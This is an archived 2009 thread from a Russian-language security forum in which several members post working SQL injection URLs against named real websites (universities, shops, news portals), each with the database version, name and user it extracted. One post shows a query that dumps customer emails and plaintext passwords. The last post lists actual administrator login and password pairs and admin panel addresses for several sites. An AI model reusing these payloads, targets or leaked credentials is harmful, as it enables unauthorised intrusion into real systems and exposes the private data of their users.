HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.02.2009, 16:34
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

PageRank = 6

Цитата:
http://www.wscal.edu/bookstore/store/mp3_details.php?id=1373+union+select+1,concat_ws(0 x3a,version(),user(),database()),3,4,5,6,7,8,9,10, 11--
4.0.27-standard
wmsem28_wmsem28@localhost
wmsem28_onlinestore


Цитата:
http://cip.gmu.edu/clib/detail.php?id=72738098097+union+select+1,concat_ws (0x3a,version(),user(),database()),3,4,5,6,7--

4.0.13-log
lawAdmin@localhost
cipp
 
Ответить с цитированием

  #2  
Старый 18.02.2009, 18:31
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию

icgadget.ca
Код:
http://www.icgadget.ca/shop.php?Cat_ID=19&SubCat_ID=-28+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4/*
DB_Ver:4.1.22-standard-log
DB:icgadget_icgadget
DB_User:icgadget_icgadge@localhost
Табличка с пользователями customers поля в ней:
email
password
пример запроса:
Код:
http://www.icgadget.ca/shop.php?Cat_ID=19&SubCat_ID=-28+UNION+SELECT+1,2,concat_ws(0x3a,email,password),4+from+customers+limit+0,1/*
пароли ничем не шифрованны =)

Последний раз редактировалось Kraneg; 18.02.2009 в 18:33..
 
Ответить с цитированием

  #3  
Старый 18.02.2009, 19:09
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

http://www.pet-world.ro/h_produs.php?kid=113&pid=-111+UNION+SELECT+concat_ws(0x3a,version(),database (),user()),2,3,4,5,6--




Database Version: 5.0.32-Debian_7etch1~bpo.1-log
Database name: resocom_petworld
User name: resocom_petworld@supremecenter49.com
 
Ответить с цитированием

  #4  
Старый 18.02.2009, 20:33
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
По умолчанию

Код:
http://www.eurosfaire.prd.fr/news/consulter.php?id=-1+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
Database Version : 4.0.24_Debian-10sarge3-log
Database name : eurosfaire
User name : eurosfaire@granit


----------------------------------------------------------+

Код:
http://www.poker-carredas.com/news.php?id=-1+union+select+1,2,concat _ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11--

Database Version : 4.0.25-standard-log
Database name : pokercar
User name : pokercar@10.0.75.134


----------------------------------------------------------+

Код:
http://fr.apa.az/news.php?id=-1+union+select+1,2,concat _ws(0x3a,version() ,database(),user()),4,5,6,7,8,9,10,11,12,13--
Database Version : 5.0.67-community
Database name : apaadm_fr
User name : apaadm_user@localhost

Последний раз редактировалось f1ng3r; 18.02.2009 в 21:19..
 
Ответить с цитированием

  #5  
Старый 18.02.2009, 20:59
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
По умолчанию

Код:
http://www.stroyportal.su/production.php?comp_id=-4740+union+select+concat_ws(0x3a,user(),database(),version())--
stroyportal@localhost:stroyportal:4.1.22-log
PR:5
ТиЦ:425

p.s вывод инфы в title.
 
Ответить с цитированием

  #6  
Старый 18.02.2009, 22:07
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

http://www.ior.ro/produse/index.php?kCtg=9&ID=-48+union+select+1,2,3,4,5,6,7,convert(concat_ws(0x 3a,version(),database(),user())+using+binary),9,0--




Version : 4.1.11-Debian_4sarge7-log
Database : dbior
User : ior@localhost
 
Ответить с цитированием

  #7  
Старый 18.02.2009, 22:21
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

http://doska.minsk-in.net/showit.php?podrobnoid=5416%27+union+select+1,2,3,v ersion(),5,6,7,8,9,10,11,12,13,14,15/*


Version : 4.1.22-log
Database : minskin9_new
User : minskin9_admin@localhost


http://www.ourkids.net/news/article.php?nid=50%27+union+select+1,version(),3,4 ,5,6,7,8,9,10,11,12+limit+1,1/*

Version : 4.1.20
Database : News
User : webuser@localhost

Последний раз редактировалось M.W.N.N.; 18.02.2009 в 22:36..
 
Ответить с цитированием

  #8  
Старый 18.02.2009, 22:25
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию

research.ohiou.edu
Код:
http://www.research.ohiou.edu/index.php?section=5&page=-230+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14/*
DB_Ver:4.1.19-log
DB_User:mediabrite@research.ohiou.edu
DB:vpresearch
 
Ответить с цитированием

blind
  #9  
Старый 18.02.2009, 22:37
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию blind

http://www.mimteam.ro/index.php?page=3&cat=44+AND+ASCII(SUBSTRING((selec t+user()),1,1))>80






Version : 5.0.67-community
Database : rmim3903_mimteam
User : rmim3902@localhost
 
Ответить с цитированием

  #10  
Старый 18.02.2009, 22:42
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


По умолчанию

QWERTY cms lite
http://lacoste-house.org.ua/index.php?act=cat&id=-3+UNION+SELECT+1,2,3,4,concat(pass459khyf,0x3a,sec ret873ktlW)+from+rkh8t5po
bpS4B1mq:z56Ntrtlkjbgnticlg1
реальный логин:пароль
admin:bpS4B1mq
Админка:
http://lacoste-house.org.ua/admin/index.php
=
Таже кмс:
http://scotland.org.ua/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
admin:paLz5C9qm1

http://apeu.org.ua/?id=-3+UNION+SELECT+1,2,3,4,5,6/*
5.0.41
user> name:pass
yyedit:tylj27.hf
admin> username:password
Невывело

И еще 2 левые скулины:
www.letradecanciones.biz/index.php?search=artistname&id=-3003+UNION+SELECT+1
www.ngo-perspektiva.org.ua/?type=page&id=-3+UNION+SELECT+1,2,3,4,5,6
 
Ответить с цитированием
Ответ





Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.